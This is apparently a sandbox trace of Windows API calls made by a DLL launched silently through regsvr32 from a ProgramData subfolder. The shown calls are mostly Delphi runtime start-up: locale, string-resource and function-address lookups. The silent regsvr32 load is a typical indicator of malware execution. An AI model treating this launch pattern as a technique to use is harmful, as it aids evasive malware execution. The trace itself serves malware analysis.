[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="LoadKeyboardLayoutA") returned 0x757fc892
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="LoadIconA") returned 0x757b64ad
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="LoadCursorA") returned 0x757b8328
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="LoadBitmapA") returned 0x757e1608
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="KillTimer") returned 0x757c64f7
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="IsZoomed") returned 0x757c4ce9
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="IsWindowVisible") returned 0x757c4d69
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="IsWindowEnabled") returned 0x757ba9b9
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="IsWindow") returned 0x757c53ba
[0086.078] GetKeyboardType (nTypeFlag=0) returned 4
[0086.078] GetCommandLineA () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\tempa\\marxvxinhhm64.dll\""
[0086.078] GetStartupInfoA (in: lpStartupInfo=0x12e6e4 | out: lpStartupInfo=0x12e6e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0086.078] GetVersion () returned 0x1db10106
[0086.078] GetVersion () returned 0x1db10106
[0086.078] GetCurrentThreadId () returned 0xf1c
[0086.078] GetModuleFileNameA (in: hModule=0x530000, lpFilename=0x12e1e0, nSize=0x105 | out: lpFilename="\x1câ\x12" (normalized: "c:\\windows\\system32\\\x1câ\x12")) returned 0x0
[0086.078] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e0bb, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0086.079] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e1d0 | out: phkResult=0x12e1d0*=0x0) returned 0x2
[0086.079] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e1d0 | out: phkResult=0x12e1d0*=0x0) returned 0x2
[0086.079] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12e1d0 | out: phkResult=0x12e1d0*=0x0) returned 0x2
[0086.079] lstrcpynA (in: lpString1=0x12e0bb, lpString2="\x1câ\x12", iMaxLength=261 | out: lpString1="\x1câ\x12") returned="\x1câ\x12"
[0086.079] GetThreadLocale () returned 0x409
[0086.079] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x12e1cb, cchData=5 | out: lpLCData="ENU") returned 4
[0086.079] lstrlenA (lpString="\x1câ\x12") returned 3
[0086.079] LoadStringA (in: hInstance=0x530000, uID=0xffdf, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0086.079] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x33ae60
[0086.079] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1790000
[0086.079] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x33be60
[0086.080] VirtualAlloc (lpAddress=0x1790000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1790000
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffde, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffdc, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffdd, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffd0, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffd8, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffef, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffec, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffd3, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffd2, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffe5, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffe6, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffe7, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffe4, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffe2, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffe0, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xffff, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xfffe, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xfffd, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0086.080] LoadStringA (in: hInstance=0x530000, uID=0xfffc, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfffb, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfffa, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff9, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff8, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff7, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff6, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff5, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff4, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff3, lpBuffer=0x12e304, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xfff1, lpBuffer=0x12e2f0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0086.081] LoadStringA (in: hInstance=0x530000, uID=0xffe1, lpBuffer=0x12e2f0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0086.081] GetVersionExA (in: lpVersionInformation=0x12e688*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x12e734, dwMinorVersion=0x76f3e0ed, dwBuildNumber=0xa56cb, dwPlatformId=0xfffffffe, szCSDVersion="\x3c\x9f\xf7\x76\x37\x1f\x37\x75\x2c\x60\x43\x75\x20\x94\x33") | out: lpVersionInformation=0x12e688*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.081] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0086.081] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0086.081] GetThreadLocale () returned 0x409
[0086.081] GetThreadLocale () returned 0x409
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x12e560, cchData=256 | out: lpLCData="Jan") returned 4
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x12e560, cchData=256 | out: lpLCData="January") returned 8
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x12e560, cchData=256 | out: lpLCData="Feb") returned 4
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x12e560, cchData=256 | out: lpLCData="February") returned 9
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x12e560, cchData=256 | out: lpLCData="Mar") returned 4
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x12e560, cchData=256 | out: lpLCData="March") returned 6
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x12e560, cchData=256 | out: lpLCData="Apr") returned 4
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x12e560, cchData=256 | out: lpLCData="April") returned 6
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x12e560, cchData=256 | out: lpLCData="May") returned 4
[0086.081] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x12e560, cchData=256 | out: lpLCData="May") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x12e560, cchData=256 | out: lpLCData="Jun") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x12e560, cchData=256 | out: lpLCData="June") returned 5
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x12e560, cchData=256 | out: lpLCData="Jul") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x12e560, cchData=256 | out: lpLCData="July") returned 5
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x12e560, cchData=256 | out: lpLCData="Aug") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x12e560, cchData=256 | out: lpLCData="August") returned 7
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x12e560, cchData=256 | out: lpLCData="Sep") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x12e560, cchData=256 | out: lpLCData="September") returned 10
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x12e560, cchData=256 | out: lpLCData="Oct") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x12e560, cchData=256 | out: lpLCData="October") returned 8
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x12e560, cchData=256 | out: lpLCData="Nov") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x12e560, cchData=256 | out: lpLCData="November") returned 9
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x12e560, cchData=256 | out: lpLCData="Dec") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x12e560, cchData=256 | out: lpLCData="December") returned 9
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x12e560, cchData=256 | out: lpLCData="Sun") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x12e560, cchData=256 | out: lpLCData="Sunday") returned 7
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x12e560, cchData=256 | out: lpLCData="Mon") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x12e560, cchData=256 | out: lpLCData="Monday") returned 7
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x12e560, cchData=256 | out: lpLCData="Tue") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x12e560, cchData=256 | out: lpLCData="Tuesday") returned 8
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x12e560, cchData=256 | out: lpLCData="Wed") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x12e560, cchData=256 | out: lpLCData="Wednesday") returned 10
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x12e560, cchData=256 | out: lpLCData="Thu") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x12e560, cchData=256 | out: lpLCData="Thursday") returned 9
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x12e560, cchData=256 | out: lpLCData="Fri") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x12e560, cchData=256 | out: lpLCData="Friday") returned 7
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x12e560, cchData=256 | out: lpLCData="Sat") returned 4
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x12e560, cchData=256 | out: lpLCData="Saturday") returned 9
[0086.082] GetThreadLocale () returned 0x409
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="$") returned 2
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="0") returned 2
[0086.082] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="0") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x12e6b4, cchData=2 | out: lpLCData=",") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x12e6b4, cchData=2 | out: lpLCData=".") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="2") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x12e6b4, cchData=2 | out: lpLCData="/") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0086.083] GetThreadLocale () returned 0x409
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12e588, cchData=256 | out: lpLCData="1") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0086.083] GetThreadLocale () returned 0x409
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12e588, cchData=256 | out: lpLCData="1") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x12e6b4, cchData=2 | out: lpLCData=":") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="AM") returned 3
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="PM") returned 3
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="0") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="0") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x12e5bc, cchData=256 | out: lpLCData="0") returned 2
[0086.083] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x12e6b4, cchData=2 | out: lpLCData=",") returned 2
[0086.083] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0086.083] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0086.083] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0086.083] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0086.083] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0086.084] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0086.085] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0086.085] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xd8
[0086.085] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xdc
[0086.085] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe0
[0086.086] GetDC (hWnd=0x0) returned 0x2b010799
[0086.086] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.086] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.086] GetDC (hWnd=0x0) returned 0x2b010799
[0086.086] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0086.086] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.086] CreatePalette (plpal=0x12e318) returned 0x5f0806f8
[0086.086] GetStockObject (i=7) returned 0x1b00017
[0086.086] GetStockObject (i=5) returned 0x1900015
[0086.086] GetStockObject (i=13) returned 0x18a002e
[0086.086] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.086] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0086.086] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0086.086] LoadStringA (in: hInstance=0x530000, uID=0xff4c, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff4b, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff4a, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff49, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff48, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff47, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff46, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff45, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff44, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff43, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff42, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff41, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff40, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff5f, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff5e, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff5d, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff5c, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff5b, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff05, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff04, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff03, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff02, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0086.087] LoadStringA (in: hInstance=0x530000, uID=0xff01, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff00, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff1f, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff1e, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff1d, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff1c, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff1b, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff1a, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff19, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff18, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff17, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff16, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff15, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff14, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff13, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff12, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff11, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff10, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff2f, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff2e, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff2d, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff2c, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff2b, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff2a, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff29, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff28, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff27, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff26, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff25, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0086.088] LoadStringA (in: hInstance=0x530000, uID=0xff24, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff23, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff22, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
